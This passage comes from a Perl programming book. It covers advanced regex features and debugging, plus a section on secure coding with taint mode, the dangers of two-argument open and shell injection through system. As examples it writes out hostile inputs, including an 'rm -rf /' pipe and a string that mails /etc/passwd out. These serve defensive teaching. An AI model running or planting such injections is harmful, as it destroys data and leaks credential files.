grep’s job. It takes the
first argument from the command line and uses it as the regex in the
while statement. That’s nothing special
(yet); we showed you how to do this in Learning Perl. I can use the string
in $regex as my pattern, and Perl
compiles it when it interpolates the string in the match
operator:

#!/usr/bin/perl
# perl-grep.pl
my $regex = shift @ARGV;
print "Regex is [$regex]\n";
while( <> )
{
    print if m/$regex/;
}

new in all of the Perl programs in the current
directory:

% perl-grep.pl new *.pl
Regex is [new]
my $regexp = Regexp::English->new
my $graph = GraphViz::Regex->new($regex);
[ qr/\G(\n)/, "newline" ],
{ ( $1, "newline char" ) }
print YAPE::Regex::Explain->new( $ARGV[0] )->explain;

$ ./perl-grep.pl "(perl" *.pl
Regex is [(perl]
Unmatched ( in regex; marked by <-- HERE in m/( <-- HERE perl/
at ./perl-grep.pl line 10, <> line 1.

qr// is a regex quoting operator that stores my regex in a scalar (and as a
quoting operator, its documentation shows up in
perlop). The qr//
compiles the pattern so it’s ready to use when I interpolate $regex in the match operator. I wrap the
eval operator around the qr// to catch the error, even though I end up
die-ing anyway:

#!/usr/bin/perl
# perl-grep2.pl
my $pattern = shift @ARGV;
my $regex = eval { qr/$pattern/ };
die "Check your pattern! $@" if $@;
while( <> )
{
    print if m/$regex/;
}
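The same eval-around-qr// idea can be wrapped in a subroutine so that the caller decides what to do with a bad pattern. This is only a sketch: compile_pattern is a hypothetical helper name, not something from perl-grep2.pl, and the two sample patterns are the ones used on the command line earlier.

```perl
use strict;
use warnings;

# compile_pattern is a hypothetical helper, not part of perl-grep2.pl.
# It returns the compiled regex and an empty string on success,
# or undef and the error text on failure.
sub compile_pattern {
    my( $pattern ) = @_;
    my $regex = eval { qr/$pattern/ };
    return ( undef, $@ ) unless defined $regex;
    return ( $regex, '' );
}

my( $good, $good_error ) = compile_pattern( 'new' );
my( $bad,  $bad_error  ) = compile_pattern( '(perl' );

print "Compiled [new]\n" if defined $good;
print "Rejected [(perl]: $bad_error" unless defined $bad;
```

Returning the error instead of die-ing lets a program that takes many patterns report every bad one before it gives up.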
(?:PATTERN). This way, I don’t get unwanted data
in my capturing groups.

and or or. In @strings
I have some strings that express pairs. The conjunction may change, so in
my regex I use the alternation and|or.
My problem is precedence. Alternation has lower precedence than sequence, so
without grouping the pattern means "(\S+) and" or "or (\S+)". I
need to enclose the alternation in parentheses, (\S+) (and|or)
(\S+), to make it work:

#!/usr/bin/perl
my @strings = (
    "Fred and Barney",
    "Gilligan or Skipper",
    "Fred and Ginger",
    );
foreach my $string ( @strings )
{
    # $string =~ m/(\S+) and|or (\S+)/; # doesn't work
    $string =~ m/(\S+) (and|or) (\S+)/;
    print "\$1: $1\n\$2: $2\n\$3: $3\n";
    print "-" x 10, "\n";
}
$2 (). That’s an artifact.

| Not grouping and\|or | Grouping and\|or |
|---|---|
| $1: Fred | $1: Fred |
| $2: | $2: and |
| $3: | $3: Barney |
| ---------- | ---------- |
| $1: | $1: Gilligan |
| $2: Skipper | $2: or |
| $3: | $3: Skipper |
| ---------- | ---------- |
| $1: Fred | $1: Fred |
| $2: | $2: and |
| $3: | $3: Ginger |
| ---------- | ---------- |
@names:

# extra element!
my @names = ( $string =~ m/(\S+) (and|or) (\S+)/ );
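To make the extra element concrete, here is a small sketch that runs the same match in list context twice, once with capturing parentheses and once with the (?:...) form that the following text describes. The variable names @with_capture and @without_capture are mine, chosen for illustration.

```perl
use strict;
use warnings;

my $string = "Fred and Barney";

# Capturing parentheses around the alternation add an element
# for the conjunction.
my @with_capture = ( $string =~ m/(\S+) (and|or) (\S+)/ );

# (?:...) groups without capturing, so only the two names come back.
my @without_capture = ( $string =~ m/(\S+) (?:and|or) (\S+)/ );

print "Capturing:    @with_capture\n";
print "Noncapturing: @without_capture\n";
```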
?: right after the opening parenthesis of the
group, which turns them into noncapturing parentheses. Instead of (and|or), I now have (?:and|or). This form doesn’t set the
memory variables, and it doesn’t count toward the numbering of the memory
variables either. I can apply quantifiers to it just as I can with plain
parentheses. Now I don’t get my extra element in @names.

/x flag to either
the match or substitution operators, Perl ignores literal whitespace in
the pattern. This means that I can spread out the parts of my pattern to make
the pattern more discernible. Gisle Aas’s HTTP::Date module parses a
date by trying several different regexes. Here’s one of his regular
expressions, although I’ve modified it to appear on a single line, wrapped
to fit on this page:

/^(\d\d?)(?:\s+|[-\/])(\w+)(?:\s+|[-\/])↲
(\d+)(?:(?:\s+|:)(\d\d?):(\d\d)(?::(\d\d))↲
?)?\s*([-+]?\d{2,4}|(?![APap][Mm]\b)[A-Za-z]+)?\s*(?:\(\w+\))?\s*$/

/x
flag to break apart the regex and add comments to show me what each piece
of the pattern does. With /x, Perl
ignores literal whitespace and Perl-style comments inside the regex.
Here’s Gisle’s actual code, which is much easier to understand:

/^
    (\d\d?)               # day
       (?:\s+|[-\/])
    (\w+)                 # month
       (?:\s+|[-\/])
    (\d+)                 # year
    (?:
          (?:\s+|:)       # separator before clock
       (\d\d?):(\d\d)     # hour:min
       (?::(\d\d))?       # optional seconds
    )?                    # optional clock
       \s*
    ([-+]?\d{2,4}|(?![APap][Mm]\b)[A-Za-z]+)? # timezone
       \s*
    (?:\(\w+\))?          # ASCII representation of timezone in parens.
       \s*$
/x
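A much smaller pattern shows the same technique and one thing to watch for: under /x a literal space has to be protected, here with a character class. This is a sketch only. The clock format, the $clock variable, and the parse_clock helper are my own inventions for illustration and do not come from HTTP::Date.

```perl
use strict;
use warnings;

# A hypothetical clock pattern for illustration; it is not from HTTP::Date.
my $clock = qr/
    \A
    (\d\d?) : (\d\d)     # hour:min
    (?: : (\d\d) )?      # optional seconds
    [ ]                  # one literal space, protected by a character class
    ([AP]M)              # meridian
    \z
/x;

# Returns hour, minute, seconds (possibly undef), and meridian,
# or an empty list if the string does not match.
sub parse_clock {
    my( $string ) = @_;
    return $string =~ $clock;
}

my( $hour, $min, $sec, $meridian ) = parse_clock( '9:05:30 PM' );
print "hour=$hour min=$min sec=$sec meridian=$meridian\n";
```

Comments inside a /x pattern cannot contain the pattern delimiter, so I keep slashes out of them.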
/g
flag that you can use to make all possible substitutions, but
it’s more useful than that. I can use it with the match operator, where it
does different things in scalar and list context. We told you that the
match operator returns true if it matches and false otherwise. That’s
still true (we wouldn’t have lied to you), but it’s not just a boolean
value. The list context behavior is the most useful. With the /g flag, the match operator returns all of the
memory matches:

$_ = "Just another Perl hacker,";
my @words = /(\S+)/g; # "Just" "another" "Perl" "hacker,"

my $word_count = () = /(\S+)/g;

() in there.

/g flag
does some extra work we didn’t tell you about earlier. During a successful
match, Perl remembers its position in the string, and when I match against
that same string again, Perl starts where it left off in that string. It
returns the result of one application of the pattern to the string:

$_ = "Just another Perl hacker,";
my @words = /(\S+)/g; # "Just" "another" "Perl" "hacker,"
while( /(\S+)/g ) # scalar context
{
    print "Next word is '$1'\n";
}

Next word is 'Just'
Next word is 'another'
Next word is 'Perl'
Next word is 'hacker,'
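The position that Perl remembers is available through the pos built-in, so I can watch it advance. The sketch below uses the same string and pattern; the @ends array is a name I made up to record the offsets.

```perl
use strict;
use warnings;

$_ = "Just another Perl hacker,";

# A list assignment evaluated in scalar context yields the number
# of elements on its right side, which here is the number of matches.
my $word_count = () = /(\S+)/g;
print "There are $word_count words\n";

# In scalar context, each match resumes at pos(), the offset just
# past the end of the previous match.
my @ends;
while( /(\S+)/g ) {
    push @ends, pos();
    print "'$1' ends at offset ", pos(), "\n";
}
```

The list-context match runs until it fails, which resets the position, so the while loop starts from the beginning of the string.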
^, $, and
\b, and I just showed the \G anchor. Using a lookaround, I can describe my
own anchor as a regex, and just like the other anchors, lookarounds don’t count
as part of the pattern or consume part of the string. They specify a
condition that must be true, but they don’t add to the part of the string
that the overall pattern matches.

Wilma and Fred in the alternation so I can try either
order. A second try separates them into two regexes:

#!/usr/bin/perl
# fred-and-wilma.pl
$_ = "Here come Wilma and Fred!";
print "Matches: $_\n" if /Fred.*Wilma|Wilma.*Fred/;
print "Matches: $_\n" if /Fred/ && /Wilma/;
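A lookahead gives a third way to ask for both names in either order with a single regex. This is a sketch of that idea, not necessarily the form the text goes on to use, and the $both variable and the sample strings are mine.

```perl
use strict;
use warnings;

# Each (?=...) is tested at the start of the string and consumes
# nothing, so both conditions must hold but neither fixes the order.
my $both = qr/\A(?=.*Fred)(?=.*Wilma)/s;   # hypothetical name

for my $line ( "Here come Wilma and Fred!", "Fred and Wilma", "Only Fred" ) {
    my $verdict = $line =~ $both ? 'matches' : 'does not match';
    print "$verdict: $line\n";
}
```

Adding a third required name is one more lookahead, where the alternation would need every ordering spelled out.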
-D switch turns on debugging options for the Perl interpreter (not
for your program). The switch takes a
series of letters or numbers to indicate what it should turn on. The
-Dr option turns on regex parsing and
execution debugging.

#!/usr/bin/perl
$ARGV[0] =~ /$ARGV[1]/;
Just
another Perl hacker, and the regex Just
another (\S+) hacker,, I see two major sections of output, which
the perldebguts documentation explains at
length. First, Perl compiles the regex, and the -Dr output shows how Perl parsed the regex. It
shows the regex nodes, such as EXACT
and NSPACE, as well as any
optimizations, such as anchored "Just another
". Second, it tries to match the target string, and shows its
progress through the nodes. It’s a lot of information, but it shows me
exactly what it’s doing:

$ perl -Dr explain-regex 'Just another Perl hacker,' 'Just another (\S+) hacker,'
Omitting $` $& $' support.
EXECUTING...
Compiling REx `Just another (\S+) hacker,'
size 15 Got 124 bytes for offset annotations.
first at 1
rarest char k at 4
rarest char J at 0
1: EXACT <Just another >(6)
6: OPEN1(8)
8: PLUS(10)
9: NSPACE(0)
10: CLOSE1(12)
12: EXACT < hacker,>(15)
15: END(0)
anchored "Just another " at 0 floating " hacker," at 14..2147483647 (checking anchored) minlen 22
Offsets: [15]
1[13] 0[0] 0[0] 0[0] 0[0] 14[1] 0[0] 17[1] 15[2] 18[1] 0[0] 19[8] 0[0] 0[0] 27[0]
Guessing start of match, REx "Just another (\S+) hacker," against "Just another Perl hacker,"...
Found anchored substr "Just another " at offset 0...
Found floating substr " hacker," at offset 17...
Guessed: match at offset 0
Matching REx "Just another (\S+) hacker," against "Just another Perl hacker,"
Setting an EVAL scope, savestack=3
0 <> <Just another> | 1: EXACT <Just another >
13 <ther > <Perl ha> | 6: OPEN1
13 <ther > <Perl ha> | 8: PLUS
NSPACE can match 4 times out of 2147483647...
Setting an EVAL scope, savestack=3
17 < Perl> < hacker> | 10: CLOSE1
17 < Perl> < hacker> | 12: EXACT < hacker,>
25 <Perl hacker,> <> | 15: END
Match successful!
Freeing REx: `"Just another (\\S+) hacker,"'
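The -D switches need a perl compiled with debugging support. The re pragma can produce similar output from inside the program, limited to a lexical scope. Here is a minimal sketch with the same string and pattern; the $target and $type variables are names I chose, and the exact output format differs between perl versions.

```perl
use strict;
use warnings;

my $target = 'Just another Perl hacker,';
my $type;
{
    # The pragma is lexically scoped: only regexes compiled inside
    # this block report their compilation and execution, and the
    # report goes to standard error.
    use re 'debug';
    ( $type ) = $target =~ /Just another (\S+) hacker,/;
}
print "The type of hacker is [$type]\n";
```

I copy the capture into $type inside the block because $1 is restored when the enclosing block ends.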
\w (word characters), \d (digits), and the others denoted by backslash
sequences. I can also use the POSIX character classes. I enclose the name in
square brackets with colons on both sides, and that whole construct goes inside
a bracketed character class:

print "Found alphabetic character!\n" if $string =~ m/[[:alpha:]]/;
print "Found hex digit!\n" if $string =~ m/[[:xdigit:]]/;

^,
after the first colon:

print "Found a non-alphabetic character!\n" if $string =~ m/[[:^alpha:]]/;
print "Found a non-space character!\n" if $string =~ m/[[:^space:]]/;
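The doubled brackets matter. Written alone, [:alpha:] is an ordinary character class containing a colon and the letters a, l, p, and h, and perl warns about it when warnings are on. The sketch below uses the bracketed form throughout; the sample string and the @non_alpha array are mine.

```perl
use strict;
use warnings;

my $string = 'ab12';

# [[:alpha:]] is a bracketed class whose only member is the POSIX class.
print "Found alphabetic character!\n" if $string =~ m/[[:alpha:]]/;

# POSIX classes combine with other members of the same bracketed class.
print "Found a hex digit or underscore!\n" if $string =~ m/[[:xdigit:]_]/;

# [[:^alpha:]] matches one character that is not alphabetic.
my @non_alpha = $string =~ m/([[:^alpha:]])/g;
print "Non-alphabetic characters: @non_alpha\n";
```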
\p{Name} sequence (little
p) includes the characters for the named property, and the \P{Name} sequence (big P) is its
complement:

print "Found ASCII character!\n" if $string =~ m/\p{IsASCII}/;
print "Found control characters!\n" if $string =~ m/\p{IsCntrl}/;
print "Found a non-punctuation character!\n" if $string =~ m/\P{IsPunct}/;
print "Found a non-uppercase character!\n" if $string =~ m/\P{IsUpper}/;
Regexp::Common module provides pretested and known-to-work regexes for, well,
common things such as web addresses, numbers, postal codes, and even
profanity. It gives me a multilevel hash %RE that has regexes as its values. If I don’t
like that, I can use its function interface:

use Regexp::Common qw(RE_ALL); # RE_ALL imports the RE_* functions
print "Found a real number\n" if $string =~ /$RE{num}{real}/;
print "Found a real number\n" if $string =~ RE_num_real();
Regexp::English, which uses a series of
chained methods to return an object that stands in for a regex. It’s
probably not something you want in a real program, but it’s fun to think
about:

use Regexp::English;
my $regexp = Regexp::English->new
    ->literal( 'Just' )
    ->whitespace_char
    ->word_chars
    ->whitespace_char
    ->remember( \$type_of_hacker )
    ->word_chars
    ->end
    ->whitespace_char
    ->literal( 'hacker' );
$regexp->match( 'Just another Perl hacker,' );
print "The type of hacker is [$type_of_hacker]\n";
qr() quoting operator
lets me compile a regex for later and gives it back to me as a reference.
With the special (?) sequences, I can
make my regular expression much more powerful, as well as less
complicated. The \G anchor allows me
to anchor the next match where the last one left off, and using the
/c flag, I can try several possibilities without resetting the match
position if one of them fails.

-Dr and re
'debug'.

/x “Extended Formatting”
pride of place.

open my($fh), $file or die "Could not open [$file]: $!";
$file and from where did its value come? In
real-life code reviews, I’ve seen people do such things as using elements of
@ARGV or an environment variable,
neither of which I can control as the programmer:

my $file = $ARGV[0];
# OR ===
my $file = $ENV{FOO_CONFIG};
open. Have you ever read all of the
400-plus lines of that entry in perlfunc, or
its own manual, perlopentut? There are so
many ways to open resources in Perl that it has its own documentation
page. Several of those ways involve opening a pipe to another
program:

open my($fh), "wc -l *.pod |";
open my($fh), "| mail joe\@example.com";

$file so I execute a pipe open instead
of a file open. That’s not so hard:

$ perl program.pl "| mail joe@example.com"
$ FOO_CONFIG="rm -rf / |" perl program
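One way to stop the data from choosing the kind of open is the three-argument form, where the mode is a separate argument and the last argument is only ever a filename. The sketch below assumes that form is what I want; open_for_reading is a hypothetical helper, and the sample name is a string that the two-argument form would have run as a command.

```perl
use strict;
use warnings;

# open_for_reading is a hypothetical helper. With the mode given as
# its own argument, open treats the name as a filename and nothing else.
sub open_for_reading {
    my( $file ) = @_;
    open my $fh, '<', $file
        or die "Could not open [$file]: $!";
    return $fh;
}

# The trailing pipe is now just part of an unlikely filename.
my $fh    = eval { open_for_reading( 'echo unsafe |' ) };
my $error = $@;
print "No command was run: $error" unless $fh;
```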
open can do. It’s not going to be that
much more work than the careless method, and it will be one less thing I
have to worry about.

-T switch, Perl marks
any data that come from outside the program as tainted, or insecure, and
Perl won’t let me use those data to interact with anything outside of the
program. This way, I can avoid several security problems that come with
communicating with other processes. This is all or nothing. Once I turn it
on, it applies to the whole program and all of the data.

echo to print a message:

#!/usr/bin/perl -T
system qq|echo "Args are @ARGV"|;
PATH. By using only a
program name, system uses the PATH setting. Users can set that to anything they like
before they run my program, and I’ve allowed outside data to influence the
working of the program. When I run the program, Perl realizes that the
PATH string is tamper-able, so it stops
my program and reminds me about its insecurity:

@ARGV to extract a filename. I use a character
class to specify exactly what I want. In this case, I only want letters,
digits, underscores, dots, and hyphens. I don’t want anything that might
be a directory separator:

my( $file ) = $ARGV[0] =~ m/^([A-Z0-9_.-]+)$/ig;

my( $file ) = $ARGV[0] =~ m/(.*)/i;
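The allow-list match can live in a small subroutine that either hands back the captured name or refuses. This is a sketch under my own assumptions: untaint_filename is a hypothetical name, the character set is the one listed above, and I use \A and \z in place of ^ and $ so that input with a trailing newline is rejected instead of quietly trimmed. It runs with or without -T; under taint mode the returned value is clean because it comes from a capture.

```perl
use strict;
use warnings;

# untaint_filename is a hypothetical helper. It returns the captured
# name, or undef if the input has any character outside the allowed set.
sub untaint_filename {
    my( $input ) = @_;
    return undef unless defined $input;
    my( $file ) = $input =~ m/\A([A-Za-z0-9_.-]+)\z/;
    return $file;
}

for my $candidate ( 'report-2.txt', '../etc/passwd', "notes.txt\n" ) {
    my $file = untaint_filename( $candidate );
    print defined $file ? "accepted [$file]\n" : "rejected input\n";
}
```

The set still allows names made only of dots, so a real program would want a further check for those.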
\w and \W (and the POSIX version [:alpha:]) actually take their definitions from
the locale. As a clever cracker, I could manipulate the locale setting in
such a way as to let through the dangerous characters I want to use. Instead
of the implicit range of characters from the shortcut, I should explicitly
state which characters I want. I can’t be too careful. It’s easier to list
the allowed characters and add ones that I miss than to list the forbidden
characters, since an allow list also excludes problem characters I don’t know about
yet.

system or exec with a single argument, Perl looks in the
argument for shell metacharacters. If it finds metacharacters, Perl passes the argument to the underlying
shell for interpolation. Knowing this, I could construct a shell command
that did something the program does not intend. Perhaps I have a system call that seems harmless, like the call
to echo:

system( "/bin/echo $message" );
$message does more than provide an argument to
echo. This string also terminates the
command by using a semicolon, then starts a mail command that uses
input redirection:

'Hello World!'; mail joe@example.com < /etc/passwd

system and exec in the list form. In that case, Perl uses
the first argument as the program name and calls execvp directly, bypassing the shell and any
interpolation or translation it might do:

system "/bin/echo", $message;
system does
not automatically trigger its list processing mode. If the array has only
one element, system only sees one
argument. If system sees any shell
metacharacters in that single scalar element, it passes the whole command
to the shell, special characters and all:

@args = ( "/bin/echo $message" );
system @args; # single argument form still, might go to shell

@args = ( "/bin/echo", $message );
system @args; # list form, which is fine.

$args[0] twice, it really doesn’t. It’s a special
indirect object notation that turns on the list processing mode and
assumes that the first argument is the command name:

system { $args[0] } @args;
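Here is a runnable sketch of the indirect object form with a hostile-looking argument. To keep it independent of where echo lives, I let the running perl (its path is in $^X) stand in for /bin/echo. That substitution, the one-line child program, and the sample message are my assumptions for the example.

```perl
use strict;
use warnings;

# In the single-string form, a shell would treat the semicolon as the
# end of one command and the start of another.
my $message = q{Hello World!; echo injected};

# $^X is the path of the running perl; it stands in for /bin/echo.
my @args = ( $^X, '-e', 'print "Got [$ARGV[0]]\n"', $message );

# Indirect object form: the block names the program, and the list is
# handed to it directly, without a shell.
my $status = system { $args[0] } @args;
print "Exit status: $status\n";
```

The child receives the whole message, semicolon included, as one argument, so the second command never runs.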
system and exec talk about their security features.

open built-in can do, and there is
even more in perlopentut.

perl interpreters or programs is often
instructive.

perl5db.pl. Since it is just a
program, I can use it as the basis for writing my own debuggers to suit my
needs, or I can use the interface perl5db.pl provides to configure its actions. That’s just the beginning,
though. I can write my own debugger or use one of the many debuggers created
by other Perl masters.

strict and warnings.
I have the most trouble with smaller programs for which I don’t think I
need strict and then I make the stupid mistakes it
would have caught. I spend much more time than I should have tracking down
something Perl would have shown me instantly. Common mistakes seem to be
the hardest for me to debug. Learn from the master: don’t discount
strict or warnings for even small programs.

strict and warnings turned
on from the command line:

$ perl -Mstrict -Mwarnings program
print is my best debugger. I could load source into a debugger, set
some inputs and breakpoints, and watch what happens, but often I can
insert a couple of print statements and
simply run the program normally.

I put square brackets around the variable so I can see any leading or
trailing whitespace:

print "The value of var before is [$var]\n";
#... operations affecting $var;
print "The value of var after is [$var]\n";
print
because I can do the same thing with warn, which sends
its output to standard error:

warn "The value of var before is [$var]";
#... operations affecting $var;
warn "The value of var after is [$var]";

warn message, it gives me the filename and line
number of the warn:

The value of var before is [$var] at program.pl line 123.
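Whether warn adds the location depends on the trailing newline. The sketch below collects the warnings in an array so I can print them and compare. The __WARN__ handler and the @messages array exist only to make the example easy to inspect and are not something the text calls for.

```perl
use strict;
use warnings;

my @messages;
# Collect warnings in an array instead of sending them to standard
# error, only so this sketch can show their text.
local $SIG{__WARN__} = sub { push @messages, $_[0] };

my $var = ' padded ';
warn "The value of var is [$var]";      # no newline: perl adds the location
warn "The value of var is [$var]\n";    # newline: message is left as written

print for @messages;
```

The brackets make the leading and trailing spaces in $var visible in both messages.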
Data::Dumper to show it. It handles hash and array
references just fine, so I use a different character, the angle brackets
in this case, to offset the output that comes from
Data::Dumper:

use Data::Dumper qw(Dumper);
warn "T